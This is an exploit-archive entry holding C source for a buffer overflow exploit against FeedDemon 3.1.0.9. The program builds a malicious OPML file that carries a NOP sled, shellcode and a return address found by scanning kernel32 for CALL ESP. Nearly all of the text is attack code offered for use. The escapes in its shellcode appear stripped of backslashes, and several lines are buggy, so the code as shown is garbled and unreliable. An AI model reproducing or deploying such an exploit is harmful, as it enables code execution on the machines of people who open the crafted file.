[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]
# Title : feedDemon v3.1.0.9 opml File Buffer Overflow Exploit
# Published : 2010-02-09
# Author : fl0 fl0w
# Previous Title : LDAP Injection POC
# Next Title : FoxPlayer 1.7.0 (.m3u) Local Buffer Overflow Exploit
/*Download latest vuln app :http://www.newsgator.com/Individuals/FeedDemon/Default.aspx
This exploit identifies your OS and searches in memory for a RETCODE thus working 100%.*/
#include<stdio.h>
#include<string.h>
#include<getopt.h>
#include<windows.h>
void banner();
void exploit(char*);
void print(char*);
unsigned int getFsize(FILE*,char*);
int cpy(char*,char*);
void gen_random(char*,const int);
DWORD FindRetToEspAddress(VOID);
DWORD SearchStream(const char*,size_t,const char*,size_t);
DWORD GetNtosDelta (VOID);
DWORD GetOSVersion (VOID);
#define VULNF "test.opml"
#define VER "3.1.0.9"
#define POCNAME "feedDemon opml file buffer overflow exploit"
#define AUTHOR "fl0 fl0w"
#define IF(x,NULL) if(x==NULL)
#define FOR(i,a,b) for(i=a;i<b;++i)
#define NOPS 8006
#define FREE(x) (free(x),x=NULL)
#define NUL '�'
#define START {
#define END }
#define MYSZ size_t
#define ALLOC(i,k) malloc((MYSZ)(i)*(MYSZ)(k))
#define WXP_DELTA 0xA67FF; // SP2 Fully patched!!
#define W2K_DELTA 0x0;
#define W2K3_DELTA 0x0;
#define WVISTA_DELTA 0x0;
#define EIPOFFSET 168
#define EIPNOPOFFS 8174
typedef unsigned char BYTE; //8 bits
typedef unsigned short WORD; //2 bytes=16 bits
typedef unsigned long DWORD; //4 bytes=32 bits
typedef unsigned long long QWORD; //8 bytes=64bits
DWORD g_dwOsVersion = 0;
LPVOID g_PatchAddress = NULL;
typedef BOOL (WINAPI *PENUMDEVICES)(LPVOID*,
DWORD ,
LPDWORD);
typedef DWORD (WINAPI *PGETDEVNAME)(LPVOID ImageBase,
char *lpBaseName,
DWORD nSize);
typedef DWORD (WINAPI* PQUERYSYSTEM)(UINT, PVOID, DWORD,PDWORD);
typedef enum {
Error = -1,
True,
False=0,
success,
}Boolean;
enum OSes
{
OS_WXP=1,
OS_W2K,
OS_W2K3,
OS_VISTA
};
char shellcode[]={
"x31xC9x83xE9xDExD9xEExD9x74x24xF4x5Bx81x73x13xEC" // 204 bytes
"x2Dx36x5Ex83xEBxFCxE2xF4x10xC5x72x5ExECx2DxBD"
"x1BxD0xA6x4Ax5Bx94x2CxD9xD5xA3x35xBDx1xCCx2C"
"xDDx17x67x19xBDx5Fx2x1CxF6xC7x40xA9xF6x2AxEB"
"xECxFCx53xEDxEFxDDxAAxD7x79x12x5Ax99xC8xBDx1"
"xC8x2CxDDx38x67x21x7DxD5xB3x31x37xB5x67x31xBD"
"x5Fx7xA4x6Ax7AxE8xEEx7x9Ex88xA6x76x6Ex69xED"
"x4Ex52x67x6Dx3AxD5x9Cx31x9BxD5x84x25xDDx57x67"
"xADx86x5ExECx2DxBDx36xD0x72x7xA8x8Cx7BxBFxA6"
"x6FxEDx4DxEx84xDDxBCx5AxB3x45xAExA0x66x23x61"
"xA1xBx4Ex57x32x8Fx2Dx36x5Ex90x90x90x90x90x90"
"x90x90"
"x41x41x41x41" // "xEDx1Ex94x7C" -1 EIP offset 8368 from the beggining of the file or 168bytes from the start of shellcode buffer
"x90x90x90x90x90x90x90x90x90" //nopsleed
"x90x90x90x90x90x89xE1xFExCDxFExCDxFExCDxFExCD"
"xFExCDxFExCDx89xCCxFFxE4"};
char header[]=
{
0xFF, 0xFE, 0x3C, 0x00, 0x6F, 0x00, 0x70, 0x00, 0x6D, 0x00, 0x6C, 0x00, 0x20, 0x00, 0x76, 0x00,
0x65, 0x00, 0x72, 0x00, 0x73, 0x00, 0x69, 0x00, 0x6F, 0x00, 0x6E, 0x00, 0x3D, 0x00, 0x22, 0x00,
0x31, 0x00, 0x2E, 0x00, 0x31, 0x00, 0x22, 0x00, 0x3E, 0x00, 0x3C, 0x00, 0x62, 0x00, 0x6F, 0x00,
0x64, 0x00, 0x79, 0x00, 0x3E, 0x00, 0x3C, 0x00, 0x6F, 0x00, 0x75, 0x00, 0x74, 0x00, 0x6C, 0x00,
0x69, 0x00, 0x6E, 0x00, 0x65, 0x00, 0x20, 0x00, 0x74, 0x00, 0x65, 0x00, 0x78, 0x00, 0x74, 0x00, //83 bytes
0x3D, 0x00, 0x22, 0x00 };
char tail[]=
{
0x22, 0x00, 0x3E, 0x00, 0x3C, 0x00, 0x6F, 0x00, 0x75, 0x00, 0x74, 0x00, 0x6C, 0x00, 0x69, 0x00,
0x6E, 0x00, 0x65, 0x00, 0x20, 0x00, 0x74, 0x00, 0x65, 0x00, 0x78, 0x00, 0x74, 0x00, 0x3D, 0x00,
0x22, 0x00, 0x42, 0x00, 0x4B, 0x00, 0x49, 0x00, 0x53, 0x00, 0x22, 0x00, 0x20, 0x00, 0x74, 0x00,
0x69, 0x00, 0x74, 0x00, 0x6C, 0x00, 0x65, 0x00, 0x3D, 0x00, 0x22, 0x00, 0x53, 0x00, 0x56, 0x00,
0x52, 0x00, 0x54, 0x00, 0x22, 0x00, 0x20, 0x00, 0x74, 0x00, 0x79, 0x00, 0x70, 0x00, 0x65, 0x00,
0x3D, 0x00, 0x22, 0x00, 0x72, 0x00, 0x73, 0x00, 0x73, 0x00, 0x22, 0x00, 0x20, 0x00, 0x78, 0x00,
0x6D, 0x00, 0x6C, 0x00, 0x55, 0x00, 0x72, 0x00, 0x6C, 0x00, 0x3D, 0x00, 0x22, 0x00, 0x68, 0x00,
0x74, 0x00, 0x74, 0x00, 0x70, 0x00, 0x3A, 0x00, 0x2F, 0x00, 0x2F, 0x00, 0x6D, 0x00, 0x69, 0x00,
0x6C, 0x00, 0x77, 0x00, 0x30, 0x00, 0x72, 0x00, 0x6D, 0x00, 0x2E, 0x00, 0x63, 0x00, 0x6F, 0x00,
0x6D, 0x00, 0x2F, 0x00, 0x72, 0x00, 0x73, 0x00, 0x73, 0x00, 0x2E, 0x00, 0x70, 0x00, 0x68, 0x00,
0x70, 0x00, 0x22, 0x00, 0x2F, 0x00, 0x3E, 0x00, 0x3C, 0x00, 0x2F, 0x00, 0x6F, 0x00, 0x75, 0x00,
0x74, 0x00, 0x6C, 0x00, 0x69, 0x00, 0x6E, 0x00, 0x65, 0x00, 0x3E, 0x00, 0x3C, 0x00, 0x2F, 0x00,
0x62, 0x00, 0x6F, 0x00, 0x64, 0x00, 0x79, 0x00, 0x3E, 0x00, 0x3C, 0x00, 0x2F, 0x00, 0x6F, 0x00,
0x70, 0x00, 0x6D, 0x00, 0x6C, 0x00, 0x3E, 0x00,
} ;
char buffer[10000000];
char eip2[]="x8BxDCx67x02";
char jmpreg[]="x89xCCxFFxE4";// offset 8290 bytes
// char endp[]=;
unsigned char nop=0x90;
signed int c;
int x;
DWORD eip;
int main(){
//if(argc>2)
// while(c=getopt()!=EOF) ......
// else
// os(ret);
banner();
exploit(VULNF);
GetNtosDelta();
printf("[!]Your Retcode is: 0x%Xn",eip);
print("Done!");
printf("File is : %d bytes",x);
// printf("%d",strlen(shellcode));
getchar();
return 0;
}
void exploit(char* fname){
FILE* f=fopen(fname,"wb");
if(f) {
memset(buffer,0x90,NOPS);
eip=FindRetToEspAddress();
memcpy(shellcode+EIPOFFSET,&eip,4);
fwrite(header,sizeof(char),84,f);
fwrite(buffer,sizeof(char),NOPS,f);
fwrite(shellcode,sizeof(char),204,f);
fwrite(tail,sizeof(char),216,f);
fclose(f);
free(buffer);
}
else {print("error writing file"); exit(0);}
x=getFsize(f,VULNF);
}
void banner(){printf("[*]%sn[*]Ver %sn[*]Author %sn",POCNAME,VER,AUTHOR); }
void gen_random(char *s, const int len)
{ int i; //helps u find the offsets
static const char alphanum[] ="0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz";
FOR(i,0,len)
{
s[i]=alphanum[rand()%(sizeof(alphanum)-1)];
}
s[len]=0;
}
unsigned int getFsize(FILE* g,char* gname)
{
unsigned int s;
g=fopen(gname,"rb");
IF(g,NULL)
{
print("File error at reading");
exit(0);
}
fseek(g,0,SEEK_END);
s=ftell(g);
return s;
}
int cpy(char* source,char* dest)
{
int len;
len=strlen(source);
memcpy(dest,&source,len+1);
return len;
}
void print(char* msg)
{
printf("[*]%sn",msg);
}
DWORD GetOSVersion (VOID)
{
OSVERSIONINFOA osvi;
DWORD retval = 0;
osvi.dwOSVersionInfoSize = sizeof(OSVERSIONINFOA);
if ( GetVersionExA(&osvi) )
{
if (osvi.dwMajorVersion == 5)
{
switch(osvi.dwMinorVersion)
{
case 0:
retval = OS_W2K;
break;
case 1:
retval = OS_WXP;
break;
case 2:
retval = OS_W2K3;
break;
}
}
else if (osvi.dwMajorVersion == 6)
{
retval = OS_VISTA;
}
}
g_dwOsVersion = retval;
return retval;
}
DWORD GetNtosDelta (VOID)
{
DWORD retval = 0;
switch(GetOSVersion())
{
case OS_VISTA:
print("System identified as Windows Vistan");
retval = WVISTA_DELTA;
break;
case OS_W2K:
print("System identified as Windows 2000n");
retval = W2K_DELTA;
break;
case OS_W2K3:
print("System identified as Windows 2003n");
retval = W2K3_DELTA;
break;
case OS_WXP:
print("System identified as Windows XPn");
retval = WXP_DELTA;
break;
default:
print("Unidentified system!n");
}
return retval;
}
DWORD SearchStream(
const char *pvStream,
size_t uStreamSize,
const char *pvSubStream,
size_t uSubStreamSize
)
{
unsigned int uCount = 0,i,j;
while( (uStreamSize) > (uCount) ) {
for(i=0;i<=(uSubStreamSize-1);i++) {
if(*pvStream != pvSubStream[i]) {
*pvStream++;
if( i>0 ) {
for(j=0;j<i;j++)
*pvStream--;
}
break;
}
if( i == (uSubStreamSize-1) )
return (uCount);
*pvStream++;
}
uCount++;
}
return -1;
}
DWORD FindRetToEspAddress(VOID)
{
HMODULE hModule = GetModuleHandle("kernel32.dll");
DWORD dwEspRet;
char* pszCallEsp = "xFFxD4"; // CALL ESP
PIMAGE_DOS_HEADER pimage_dos_header;
PIMAGE_NT_HEADERS pimage_nt_headers;
pimage_dos_header = (PIMAGE_DOS_HEADER)hModule;
pimage_nt_headers = (PIMAGE_NT_HEADERS)((DWORD)hModule+pimage_dos_header->e_lfanew);
dwEspRet = SearchStream((char*)hModule,pimage_nt_headers->OptionalHeader.SizeOfImage,pszCallEsp,sizeof(WORD));
return (dwEspRet += (DWORD)hModule);
}